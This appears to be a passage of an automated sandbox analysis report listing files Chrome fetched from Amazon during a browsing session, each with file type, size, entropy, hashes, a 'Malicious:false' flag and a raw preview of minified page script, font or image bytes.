                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (560)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8874
                                                                                                                                                                                                                                                                      Entropy (8bit):5.481319733535202
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1tRWM9BVlNUBOiH5MFbHLfDNN/W0NOEAHB26aopvjAwzULV65:37HjahBAyJ
                                                                                                                                                                                                                                                                      MD5:754C1446B24C549375A5B3E510B1E36E
                                                                                                                                                                                                                                                                      SHA1:CE23F09ADA8D964D2DF64FAA277C750E52F74D75
                                                                                                                                                                                                                                                                      SHA-256:E538279AD4FCB10FC3823D7204B869E43CF3D98F1137FABE777DF40AB2E2DF2D
                                                                                                                                                                                                                                                                      SHA-512:A06FC44108929C6427132D39C3E2CAD70293C3A72685785092811E1609B43B6B983CF6A981F1BAEF2723CA5BFC0E98F5218D4D384508B75435B07DA6EA75603B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(f){var h=window.AmazonUIPageJS||window.P,l=h._namespace||h.attributeErrors,m=l?l("AllOffersDisplayIngressAssets",""):h;m.guardFatal?m.guardFatal(f)(m,window):m.execute(function(){f(m,window)})})(function(f,h,l){f.execute("all-offers-display-ingress-init",function(){var m=h.uet,n=h.uex;"function"===typeof m&&m("bb","aod-ingress-assets-load-time",{wb:1});f.when("A","jQuery","all_offers_display_ingress_utils","all-offers-display-register-state","all_offers_display_ingress_csm_counters").execute("all_offers_display_ingress_load_AOD_assets",.function(a,d,c,g,e){function k(b){f.now().execute(function(c){c!==l||g.isMarkerOverrideRegistered()||("function"===typeof q&&q("bb","aod-main-assets-injection",{wb:1}),f.register("aodIngressClick"),f.register("aodDeclarativeEvent",function(){return b}),g.setMarkerOverrideTriggered())})}var q=h.uet;a.state("aod:assetsLoaded",{isAodAssetsLoaded:!0});e.triggerUnitCounter("aodIngressAssetsLoadCtr");a.declarative("show-all-offers-display","click",f
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26ctb%3D1%26sc0%3Dadplacements%3AsfImpression%3AGateway%3Adesktop-ad-center-1%3Adesktop%26bb0%3D4763%26pc0%3D65845%26ld0%3D65811%26t0%3DWed%20Aug%2021%202024%2014%3A29%3A45%20GMT-0400%20(Eastern%20Daylight%20Time)%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:65844
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (617)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):103667
                                                                                                                                                                                                                                                                      Entropy (8bit):5.589142445494549
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:0hQRt0N6YbeH9SW4Jz87r9fYcNWoEkcDn4uPAHQ3I+FQzXfe8cwiMHZUPLrrC1et:0hEeWUD1gUUUPE0J17N
                                                                                                                                                                                                                                                                      MD5:AD40A4180F42101F31B0DDE98932E00C
                                                                                                                                                                                                                                                                      SHA1:92775860826E962432BCF53F542B54F6D46CF20A
                                                                                                                                                                                                                                                                      SHA-256:E1533CC48820E67C43824CD83FB418ABBF06CE05615B5283C943D6294F5B8AA1
                                                                                                                                                                                                                                                                      SHA-512:63C2C29839630EDF1FEB6871856102CE6DD1BB72A87DFED450ADFAB00F4BB52BEA43D7872E89F20963F6BC854B707E4CE1AA3D0FE4689516B382FCC3ECC83AA4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/61lJoq-YDAL.js?xcp
                                                                                                                                                                                                                                                                      Preview:'use strict';mix_d("SBVideoCards__sb-video-product-collection-desktop:sb-video-product-collection-desktop__bxzZAiAH","exports tslib @c/logger @c/metrics @c/pagemarker @c/scoped-dom @c/dom @p/a-ajax @p/A @c/aui-carousel @p/a-carousel-constants @p/a-carousel-framework @p/a-carousel-strategies @c/aui-utils @c/aui-truncate @c/browser-operations @c/aui-modal @c/aui-untrusted-ajax".split(" "),function($a,n,ab,y,Ub,Vb,Wb,Xb,Yb,Zb,$b,ac,bc,cc,dc,ec,fc,gc){function D(a){return a&&"object"===typeof a&&"default"in.a?a:{"default":a}}function hc(){var a=u["default"].cardRoot.querySelectorAll(".mobileEnergyEfficiencyContainer");(null===a||void 0===a?0:a.length)&&a.forEach(function(f){var g=f.querySelector(".energyEfficiencyContainer"),d=f.querySelector(".energyEfficiencyProductFicheLabel");f=f.querySelector("svg");g&&d&&f?(g.setAttribute("style","min-height:30px;"),d.setAttribute("style","font-size: 12px!important;line-height: 16px!important;"),f.setAttribute("style","height: 18px;")):M["default"].l
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 16616, version 1.655
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16616
                                                                                                                                                                                                                                                                      Entropy (8bit):7.986966282975233
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:0qJzQ61qLjMj2JfDC3uq2B/YgduJyovfw4TQRJGL7VGhX8aJl/hObP:x8LHMjGbCeqEFuBwkqJGLhGhVLsP
                                                                                                                                                                                                                                                                      MD5:4AFCD3B79B78D33386F497877A29C518
                                                                                                                                                                                                                                                                      SHA1:CC7EBAA05A2CD3B02C0929AC0475A44AB30B7EFA
                                                                                                                                                                                                                                                                      SHA-256:CDED49F94FC16DC0A14923975E159FBF4B14844593E612C1342C9E34E2F96821
                                                                                                                                                                                                                                                                      SHA-512:2DC9FFF1D57D5529C9C7BFF26FA9F3F94ADC47E9CEF51D782E55ECF93045200140706AB5816DFD4A0B49B8DB2263320FA2F0FA31A04E12D0C91FEA79B127255D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/pDxWAF1pBB0dzGB.woff2
                                                                                                                                                                                                                                                                      Preview:wOF2......@........l..@.........................?FFTM..8..z..@.`..~.....P..9.6.$..F..<.. ..,..a?webf....5l.F..VU..#7.Q...d......k...r....{.T....2KuI.1.+j...(..kvf8...7.+.&.....t..!Z..C...>..=.....v.9_.% .L.....z..........0.e....;.7>.d..S..[..&/....=.9w.n...=.FH.h$...<....s.s.F..`...c....@...}.MP.@.A`T+..J.,F..XT....@..c......TH....OZ..u.....V..u..g...#..~"...Df.\M..-...n.Cu..{f..@.b{B...x......2..;.B...Ah.).....m...Q`!V.IH.pG...T.mb..p.[.v....Z=..P...I.,....m....;..Hva.*..@..x..:.....=&'G. ..0.....Mi...LC...t6..N5..m.........TH.....mY#..g..#.$...7..}...cS{..!.'..n..3...0......lw..D.,l..x...hH.I..lZ.]...4h/..>-A...wAv....W..KeYj{.V[c..d...d/..1.g.(:..5......h.(;@..........0..]+my.qdQ.>..JGu5.v2.3/.)..h.I2.P.. ....P..l......UU..#.d......R..x...)..d...2.....ov..%'..R5.97jA.._...m#..:.Z..r..5.!1.a.`..o.\<.4..j..._.......+Y)E......."A$..-._........c.C-.\....C../C..>..;T.@K...aB.o}t.>..~...>............uP|..\|.....1.. x....-%.....<>.$M..(..e......Un.rf0
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 256x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):30387
                                                                                                                                                                                                                                                                      Entropy (8bit):7.981444412426984
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:WmvSgYtao28i0aXrgajKTZS52NKJQSVV0QXuOWxs2cDb8yVun2uKZl9cSxz0Oc/E:W82soURl7uarb8Aunu196T/dR8alLU
                                                                                                                                                                                                                                                                      MD5:9A79CC15613E9CD015EFED950A864BA6
                                                                                                                                                                                                                                                                      SHA1:227CDDD7272E002F0CDBD4C3F90E5CC891C7C731
                                                                                                                                                                                                                                                                      SHA-256:8C72C0245A0773DE97ED84362E1A0F907876C9EF240C97DEA09725E24A186DF6
                                                                                                                                                                                                                                                                      SHA-512:C06E180893462ADD4492A29F41A4B5B4C5CA53573B0A80AB6E59BA6325A152E7A09169FFBBBD8B80C45B184505E577EE69F3FDB9DF85CAC10E82FF22FC5503EE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81sxyuJnP9L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................y..^.*J+.....Z..Oe81.[i....].c...E.9..q....:.H.\....SPl/._... .X...|..;.&:.d..L...T... ?qU..DC.e+....#'...........K.....#..N.E....y~.M.....c7..;.......z.WBF..r.C...t...Cd.y.W.....(fI....b/ZN...^d......lD...%.=5E.._M.......W9.u.>M.n...&WPr.w.en....d.{&..P...".......UY....d.b,}@D.X<..W..T..a..5i..M...r@2<.[....*..8.X.Nah...........d!t/$....^.RX.~.(.|..~...G..l|(..b..!.] ..k....*.I.....C...^.?]".ol.y..E.lR....iJ.....+.(.r...b.o......|n.e....1s.v.F..#.^$.1ojv3..N...\.._..m...T^.........>..\...H6.55.P.....2(.....$K.[2f.h.,Z2u.W.!ZY... #.{.V4.|..m.zq..C........b..D..[.-|...DsP/.8L.a..P..+}.5?].r..I...k.:e-.v....~.....0H;}. ...%..$.qX7.;..A.......B.k..Q.N..I.1....3..,...gu.....F....n..1..}s.....M.&...?++....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3157
                                                                                                                                                                                                                                                                      Entropy (8bit):7.875151339724645
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rmtUzK7eeI6ahxS5ZCe1elrPbc9Gpzme4eS1HFiPnKB+XZrpzTnLpD+Np0MAQ:TDUz/4CieR1girNT1DGmMA11Rm
                                                                                                                                                                                                                                                                      MD5:8A8F97EE467B7450693CF229FE06C7A9
                                                                                                                                                                                                                                                                      SHA1:DA7E40F0F24141E573095072F2CC778901DFF45D
                                                                                                                                                                                                                                                                      SHA-256:E23AB0277A10A719139E16D976900C795F80AB34BE28F632F6530099E821E277
                                                                                                                                                                                                                                                                      SHA-512:119505C239A8645AEC99590210FC7A296B8C1B9F889C80658EA5BDCA8F5DD0186D6DE44F9677E7C658B0979B91ED4C6603A4B10EF28D1E9865499320CAF4CBF6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1A.Qaq...."2..Rr.....$3s....BS#%CTbc................................................1...!A."2..............?...*.I..........Ts.=.C...i.n....h...{y.#..5\.1.,....4M.w.....e.....i...Gq./`.....5.P...4....H>".kwN*G..`..........A....f...5..`...5.....J.J..n(.t.;...o.S.F>y...7..k.G.@P6.Q.._.H...l|4..C}...}.j....%.G.....'..O...[c..zD....B.frOge..y...."f(.A..j./.......s.wTe..j.j..UdmjY..+..(..m.7.N......M...QOi.......<dw.G..4{..b..!e..G....g..}...#..{q".3.T..W..8....Gq_.(.H.S.=..N .G...e.....QKk..GQ..8i:.#l6.XZk....SB,0......x...O....M.........G.e.._z....\....j.G..../b....>Y.\M.......~t.........3TY..|y"TZ..A.a....{)..%....^.....t..I......C|R.=..n'=...d<Px.?1Ze1.*y......iP....H[Z..u....?..Iv..'7.4.m....V...].v.S....2.. .=..Uc..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (560)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8874
                                                                                                                                                                                                                                                                      Entropy (8bit):5.481319733535202
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1tRWM9BVlNUBOiH5MFbHLfDNN/W0NOEAHB26aopvjAwzULV65:37HjahBAyJ
                                                                                                                                                                                                                                                                      MD5:754C1446B24C549375A5B3E510B1E36E
                                                                                                                                                                                                                                                                      SHA1:CE23F09ADA8D964D2DF64FAA277C750E52F74D75
                                                                                                                                                                                                                                                                      SHA-256:E538279AD4FCB10FC3823D7204B869E43CF3D98F1137FABE777DF40AB2E2DF2D
                                                                                                                                                                                                                                                                      SHA-512:A06FC44108929C6427132D39C3E2CAD70293C3A72685785092811E1609B43B6B983CF6A981F1BAEF2723CA5BFC0E98F5218D4D384508B75435B07DA6EA75603B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/31YT4iYOlWL.js?AUIClients/AllOffersDisplayIngressAssets&P3lk6dwL
                                                                                                                                                                                                                                                                      Preview:(function(f){var h=window.AmazonUIPageJS||window.P,l=h._namespace||h.attributeErrors,m=l?l("AllOffersDisplayIngressAssets",""):h;m.guardFatal?m.guardFatal(f)(m,window):m.execute(function(){f(m,window)})})(function(f,h,l){f.execute("all-offers-display-ingress-init",function(){var m=h.uet,n=h.uex;"function"===typeof m&&m("bb","aod-ingress-assets-load-time",{wb:1});f.when("A","jQuery","all_offers_display_ingress_utils","all-offers-display-register-state","all_offers_display_ingress_csm_counters").execute("all_offers_display_ingress_load_AOD_assets",.function(a,d,c,g,e){function k(b){f.now().execute(function(c){c!==l||g.isMarkerOverrideRegistered()||("function"===typeof q&&q("bb","aod-main-assets-injection",{wb:1}),f.register("aodIngressClick"),f.register("aodDeclarativeEvent",function(){return b}),g.setMarkerOverrideTriggered())})}var q=h.uet;a.state("aod:assetsLoaded",{isAodAssetsLoaded:!0});e.triggerUnitCounter("aodIngressAssetsLoadCtr");a.declarative("show-all-offers-display","click",f
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 263x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):9628
                                                                                                                                                                                                                                                                      Entropy (8bit):7.910538160103476
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:J7Zb4Ex6/HTSR20VQiHB1pYqXlFqkq7uqMiOigI+aHle:J7Zb4QGHTg2UHB1ppT7vtiOi0Ge
                                                                                                                                                                                                                                                                      MD5:68B830A67DF1B68E356E44FB4DB7415D
                                                                                                                                                                                                                                                                      SHA1:643E20012B67500E18D50CED9A9939F4A582D1A7
                                                                                                                                                                                                                                                                      SHA-256:67B214B117957A15A78AC83B38E392747855B0AADDD905F07DC27559B33B26EA
                                                                                                                                                                                                                                                                      SHA-512:5D68A36E2E3D17163A840AA7C0A1CF439F3ED32E8A18B4E0747A5A59B898460FDF63B2C133003CA582D96D1163E6C32F2906CE82EEB794FCA571BDF344FE51C0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61cw3ImGcLL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.....................................................................1.?..........jz5k...O..o...\7`..........u.. ....R..O...z....%)\^.i...o.O........:...y.,/...Ox..vf....o../..W..<X:..,............a......0..P[..Z0.M......KC.>..?..].2-.....u.`...z..q...>....5|O)..$R...I...v.......0..b2.Mu.].q^uW....F.U.Q...{..ru..v..3`.......-n.....-.ot..\._X5f[.?!Y.6.m....iH.y...n.s.=...F..........#.e.Vy..zeWz1z{5..tn/*~.B_..`>.>.._|..6...b.%.........{. .....m...Yt..Pn.o..}.2....r.....\..u.4..f.'^J%........R.......LrI....[.u.G.%9.a39<.-............./^r.Lf#.a|.....S.S........-...J....E.*..G.s.6Fi.:..~..R...J-.G*......Ew.1.....lp....|.1N|N.,.j&.Y.*...gc3N..n...7...7?E.k.........3..$.~..c..x.....1..>..+|...[...e...v.........J5.....b.xI...H.EmuT.....a.t.;.~._.....}.G.0....@c.A...a* .{....7@J.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2459
                                                                                                                                                                                                                                                                      Entropy (8bit):7.773202505765292
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rsVH4QFB7ZGr+aSkce3P7iVAJ1gt0KlMO1VAO/87RTGQT42H6Lp:TDVYeVGr+6OeJ1cr1SegRP4CG
                                                                                                                                                                                                                                                                      MD5:9ACFC70C73C81EDF49C053BD561E457E
                                                                                                                                                                                                                                                                      SHA1:39FF0ED0EA662B9BD0DF215C03BED98BC0939FDB
                                                                                                                                                                                                                                                                      SHA-256:AF51AA74C20F9BA123782B6061B655E2BA41C1B8987FA7A79167DE344859B757
                                                                                                                                                                                                                                                                      SHA-512:C6A5FE987DE1387E9F4C286A9D1AD4C0E3E68722E0A2DF6F404E031B4369CFEDC52EB88E806D6541C600C5DA938628C593E1DE17166822A72E4686BC4CF6BB9E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1"2AQ....3BUaqrs...4Rb...t....5CEc.............................................!"1..............?...D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.E..VB..#...K.....IA..........b..:.Os.R....$..&..v.c....,.`..."y..'...:.Pi....[...o..o..kF.i...CbO....j%.%ff....7k.!.PA..W>f.w#..!UOy...N.,.;NA.._...\.1.....:JIo..{.]L ;.k.A... ""." "/...N........%EC.q......>_..7.|..C!......s.LNj..R....f`O....Q.Y-C...!.H........ .,.j.m.KA[..^B.......G6.l...U]..AS,...2`.......h.n..$q..W..B......7,`;.u....Z`ig*L....6V...h.C./..~.U...3.xV7..Q...p....y5.(.O..J_..$.c'...*..e.d4..f...#......w@.A..i'...(.l..C{N.$a...b..e......%..`...nL..k...A.... a./..:.Tr...w.,-y.U3...C..m....3*$...T../i..~R...c......#..'Q.W.$.>A..rm...:.6.W..ohT5t.../h......K..G.?...............Zu..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):55925
                                                                                                                                                                                                                                                                      Entropy (8bit):7.933767658859196
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:bCB4xA5nOxbjWgdAe1HFfzVSaDHD1dH3qiNaVqkuJ:OB4xA5nO1pdlHJj7qpVqkG
                                                                                                                                                                                                                                                                      MD5:49BEEF4C5F357B2C05816C6832FE9082
                                                                                                                                                                                                                                                                      SHA1:2E2A0CE2286C221D0E9791ED357B4E60BA17A3A3
                                                                                                                                                                                                                                                                      SHA-256:E067E4A544715CA6438FDC74881532130ED11527A34EE759E2E89EA5F5A84956
                                                                                                                                                                                                                                                                      SHA-512:A25BEC5FEB4DCFDB9057153DE0FA2750929162AD031778B306A061959C773A04384CA0C93A289C7008AA474EBA4C9B9EEF5FA3AA3F10CAFBE0674A68D31153D9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................X...."..........7.....................................................................~4.................................r.......$...X.`Lr...b....,...%.A..!(.... ..<.......v<c.3......c&X.B..BL....C.h.....................................g;.=A..#..../.q..M..I..z.}Z.;MW.OP{...5@X...e..Q.I...........q.Z'...=]..r......1.JH .....;..Z ..................g'..L.Q....|.>.|.>.|.>.|.>.|.>.|.>.|.>.|.>.z..X~.+.......@.............]...qx>#.x.c?.~e.\.z#..>..$...$..>.@.,.......X....X.....X....:..../................. .......................>...r......:.....@.iz<...K...............u.t=.......W..O......?....0......\...........P..<~.....Sc..y.......s...?K.b~..l~..o... .......!......I2.....@....2.r.d0Zj.}.G.y.._............v..4@..................=...........................................1..W................#.S.O7.....|...Z.C[.5
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 303x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3693
                                                                                                                                                                                                                                                                      Entropy (8bit):7.70006233221705
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0vD8M+PfngPaPkNjWEtOaaaa7EKaPzZHwhUzkgEy/opprFBibUl1rJuEXe2Y/J:Tq8qPxVPtOaaaaKHwhYt/upr/1rJgLwa
                                                                                                                                                                                                                                                                      MD5:D89A7AB6ABDC243655F7F517034B48E9
                                                                                                                                                                                                                                                                      SHA1:B0D954C8C29FE98B5FC46F73381C23D4297B724E
                                                                                                                                                                                                                                                                      SHA-256:52C6543521E31C4A5CCE31727401863CD9AF8001E0700B6089340FAFCEE3DB0F
                                                                                                                                                                                                                                                                      SHA-512:3D7DC7C694413079A7E45EEC47F8455B4B293BEC1AB79A5364FC4FD17468F953FC5E460B76C8BB1F20B973388F981946269ECB97B308004457FFE01EEB4A13D6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/41sGtn2OWCL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......../.."..........1..................................................................j,d.......>...^..6op.eL..o..z....l8...........LfQ.?.H0..+...._JJ#2rg4..,.. .........7'.....e..J\-..+&.I....4.z............;"......jR..R.I4nJK....$........>hd:..a3xU..Nn.O:.*.d..)-.B..oX.............wZ..3xa...].9m..$vFJ......$........>i.:}..|. ]Nc.....Z..2S5.Ml. .........S.....f1.yl...+K.Y.zDI....$........>kvx9...r....\prT.T..G.$.k...B@...)_...J.=s=%...^l=%...........,+...-.[qE@.Hc..K5.H,......Ny...Ny....V..;...>>w...t(d....v...;3.~v....(......I.vDH.YY..X.|........|>`..../.........W~....h+~....h~....N;........9\T9.5;....M..{7.IJ.....J.......D.+..-.h......xm.*..................................034@... .A.1!"#2aq............_D..N!2b...f]y.z... uJ.Y.'...y...#.i}qq..Gq.V.....W."c.....bl.......8D{%.....Q.#.-.E.v.%
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 251x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10738
                                                                                                                                                                                                                                                                      Entropy (8bit):7.898284405727076
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:5g/cCAk6O2BCls38vmEXrZVd8YiMkHGrgEZvFj4ZAQyw9pDL8w:q/Rj2Als38vBbZzpiMWm9jIAQyw9pvR
                                                                                                                                                                                                                                                                      MD5:E097F29ED9EA65A1C319EDFBE656AD0B
                                                                                                                                                                                                                                                                      SHA1:B6463C1E11B56632A88349924D09A433CF19CCAC
                                                                                                                                                                                                                                                                      SHA-256:C801A4D4B9545A3A6A72456D72B4D09EBF36595FEA3007738BDFAA6978966AD4
                                                                                                                                                                                                                                                                      SHA-512:2649935040D59E544230E38C87EAC50F48B8CBBE189AB285FBFF0AD2869D63EC783DBD9F09DFE0EFCF80113B6A59090953EFCEF1B568068A8A25C1457BA43073
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3......................................................................h......1.z.......E...E..........Dw...jg..l..}w.-.T........,..........+V..l....v....w.....#.,....j.).o..bI..........K.&_=5+X.."N...).b.hy.o.........|.@......Z.O.v...}....}.^W..MY.|>..+9.?..L.......p..@..."(}..w.....:.............3..<..4....Y..w.g.M.@O......-..h....z...?N...~..z...F7<bmM.,\..~mN-.I.xq6j.m5v.........?.j..=c....k5.......5.......o.......o6k.0.....4....uN!...z.~-m..L....k...J..7f..F.|.@......>..i..5....Ch.zp...EN=^.TX......w.$|8......B.xR...........F..................&.z.....$z(.........~N......<.FJD......>.#.f.X.\V,Ev..t .....dL.$.........p....m|..Z.......|}...63x....AW/.R?._.._.1.#zT....s.....g.}.........[x.J.....<.+....................F*...bQ...........1.(.v..U..9.[..b.......H.y.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4253
                                                                                                                                                                                                                                                                      Entropy (8bit):7.693159834492515
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:R9sgEkq/xzahDr8TLnhZwIQt1fxP22K31IHasx2edONy/:87zaqrQt1fxuGx5
                                                                                                                                                                                                                                                                      MD5:A17C20E8E0813DD095428B78562E3A11
                                                                                                                                                                                                                                                                      SHA1:83D3E5D255AA47ED2821C564BAD2E9CA8C28BDF9
                                                                                                                                                                                                                                                                      SHA-256:CA4FCE334F0ADC538E66E64DB009C947055188644AB5BD2999744A256E7A94FA
                                                                                                                                                                                                                                                                      SHA-512:7E1DB7571FAB8AE3D4C78F04EF60D08C67575273B5FAE9A3B030783421B775E78DC089A5DB5933BAC27F15CBB5E1C5F0CC83A2A16311608BA495B14A79A30A3D
                                                                                                                                                                                                                                                                      Malicious:false
